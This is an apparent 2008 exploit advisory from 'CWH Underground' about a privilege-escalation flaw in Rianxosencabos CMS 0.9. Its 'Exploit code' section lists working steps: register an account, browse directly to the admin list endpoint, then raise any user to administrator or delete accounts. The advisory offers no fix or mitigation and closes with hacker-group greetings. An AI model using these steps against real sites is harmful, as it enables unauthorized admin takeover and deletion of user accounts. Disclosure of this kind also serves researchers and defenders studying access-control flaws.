============================================================ Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability ============================================================ AUTHOR : CWH Underground DATE : 21 September 2008 SITE : cwh.citec.us ################################################################################### APPLICATION : Rianxosencabos CMS VERSION : 0.9 DOWNLOAD : http://downloads.sourceforge.net/rsccms/rsccms.tar.gz ################################################################################### --- Add-Admin / Delete-Account Vulnerability --- ------------- Description ------------- Rianxosencabos CMS 0.9 has Vulnerability to escalate user to administartor's privilege. That Vulnerable in "http://[Target]/[rsccms_path]/?s=admin&accion=lista" and You can Arbitrary change user's permission or delete user This action will give your account can use All Admin Control Panel with Administrative's Privilege or Arbitrary Delete account in website. -------------- Exploit code -------------- [+] Log in with your account, You can register with this URL "http://[Target]/[rsccms_path]/?s=usuarios&accion=registrar" [+] Go to "http://[Target]/[rsccms_path]/?s=admin&accion=lista" [+] Now you can Change user permission or delete user account ##################################################################### Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #####################################################################